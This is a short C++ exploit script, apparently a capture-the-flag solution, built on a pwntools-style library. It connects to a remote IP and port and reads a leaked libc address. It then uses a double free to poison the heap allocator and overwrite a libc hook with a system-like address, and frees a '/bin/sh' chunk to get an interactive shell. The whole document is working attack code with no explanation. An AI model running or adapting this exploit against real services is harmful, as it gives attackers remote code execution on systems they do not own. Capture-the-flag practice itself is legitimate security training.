```c++
#include <pwntools>
#include <string>
#include <vector>
#include <iostream>

using namespace pwn;
//auto io = Process("./a.out");
auto io = Remote("65.1.92.179", 49155);

void add(uint32_t idx, uint32_t size, const std::string& bytes) {
	io.sendlineafter("exit\n", "1");
	io.sendlineafter("index: ",std::to_string(idx));
	io.sendlineafter("size: ",std::to_string(size));
	io.sendlineafter("input: ",bytes);
}

void rem(uint32_t idx) {
	io.sendlineafter("exit\n","2");
	io.sendlineafter("index: ",std::to_string(idx));
}
int main() {
	io.recvuntil("gift: ");
	uint64_t libc_leak = Int(io.recvline().substr(0, 14), 16);
	uint64_t libc_base = libc_leak - 0xb65b0;
	std::cout << "[+] Libc base: 0x" << std::hex << libc_base << std::endl;


	add(0, 0x18, "HKHK");
	add(1, 0x18, "HKHK");
	rem(1);
	rem(1);
	add(0, 0x18, p64(libc_base + 0x3ed8e8));
	add(0, 0x18, "/bin/sh");
	add(1, 0x18, p64(libc_base + 0x4f4e0));
	rem(0);
	io.interactive();
	return 0;
}
```
